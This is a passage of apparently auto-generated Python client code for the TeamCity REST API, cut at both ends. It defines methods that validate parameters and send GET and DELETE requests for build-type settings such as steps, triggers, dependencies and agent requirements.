all_params = ['bt_locator', 'artifact_dep_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_artifact_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_artifact_dep`") # noqa: E501
# verify the required parameter 'artifact_dep_locator' is set
if ('artifact_dep_locator' not in params or
params['artifact_dep_locator'] is None):
raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `delete_artifact_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'artifact_dep_locator' in params:
if isinstance(params['artifact_dep_locator'], TeamCityObject):
path_params['artifactDepLocator'] = params['artifact_dep_locator'].locator_id
else:
path_params['artifactDepLocator'] = params['artifact_dep_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_build_type_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""delete_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_build_type_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_build_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_build_type`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_feature_with_http_info(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""delete_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_feature_with_http_info(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_feature`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `delete_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_parameter_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_parameter_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_parameter`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_parameter_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_parameter_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_parameter_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_parameter_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_parameter_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_snapshot_dep_with_http_info(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""delete_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'snapshot_dep_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_snapshot_dep`") # noqa: E501
# verify the required parameter 'snapshot_dep_locator' is set
if ('snapshot_dep_locator' not in params or
params['snapshot_dep_locator'] is None):
raise ValueError("Missing the required parameter `snapshot_dep_locator` when calling `delete_snapshot_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'snapshot_dep_locator' in params:
if isinstance(params['snapshot_dep_locator'], TeamCityObject):
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'].locator_id
else:
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies/{snapshotDepLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_step_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""delete_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_step_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_step" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_step`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `delete_step`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_trigger_with_http_info(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""delete_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_trigger_with_http_info(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_trigger" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_trigger`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `delete_trigger`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_vcs_root_entry_with_http_info(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""delete_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'vcs_root_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_vcs_root_entry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_vcs_root_entry`") # noqa: E501
# verify the required parameter 'vcs_root_locator' is set
if ('vcs_root_locator' not in params or
params['vcs_root_locator'] is None):
raise ValueError("Missing the required parameter `vcs_root_locator` when calling `delete_vcs_root_entry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'vcs_root_locator' in params:
if isinstance(params['vcs_root_locator'], TeamCityObject):
path_params['vcsRootLocator'] = params['vcs_root_locator'].locator_id
else:
path_params['vcsRootLocator'] = params['vcs_root_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_agent_requirement_with_http_info(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""get_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str fields:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_agent_requirement" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_agent_requirement`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `get_agent_requirement`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentRequirement', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_agent_requirements_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_agent_requirements # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_agent_requirements_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: AgentRequirements
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_agent_requirements" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_agent_requirements`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentRequirements', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_aliases_with_http_info(self, bt_locator, field, **kwargs): # noqa: E501
"""get_aliases # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_aliases_with_http_info(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str field: (required)
:return: Items
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'field'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_aliases" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_aliases`") # noqa: E501
# verify the required parameter 'field' is set
if ('field' not in params or
params['field'] is None):
raise ValueError("Missing the required parameter `field` when calling `get_aliases`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'field' in params:
if isinstance(params['field'], TeamCityObject):
path_params['field'] = params['field'].locator_id
else:
path_params['field'] = params['field'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/aliases', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Items', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_artifact_dep_with_http_info(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""get_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str fields:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'artifact_dep_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_artifact_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_artifact_dep`") # noqa: E501
# verify the required parameter 'artifact_dep_locator' is set
if ('artifact_dep_locator' not in params or
params['artifact_dep_locator'] is None):
raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `get_artifact_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'artifact_dep_locator' in params:
if isinstance(params['artifact_dep_locator'], TeamCityObject):
path_params['artifactDepLocator'] = params['artifact_dep_locator'].locator_id
else:
path_params['artifactDepLocator'] = params['artifact_dep_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArtifactDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_artifact_dep_setting_with_http_info(self, bt_locator, artifact_dep_locator, field_name, **kwargs): # noqa: E501
"""get_artifact_dep_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'artifact_dep_locator', 'field_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_artifact_dep_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_artifact_dep_setting`") # noqa: E501
# verify the required parameter 'artifact_dep_locator' is set
if ('artifact_dep_locator' not in params or
params['artifact_dep_locator'] is None):
raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `get_artifact_dep_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `get_artifact_dep_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'artifact_dep_locator' in params:
if isinstance(params['artifact_dep_locator'], TeamCityObject):
path_params['artifactDepLocator'] = params['artifact_dep_locator'].locator_id
else:
path_params['artifactDepLocator'] = params['artifact_dep_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}/{fieldName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_artifact_deps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_artifact_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_artifact_deps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: ArtifactDependencies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_artifact_deps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_artifact_deps`") # noqa: E501
collection_formats = {}
path_params = {}
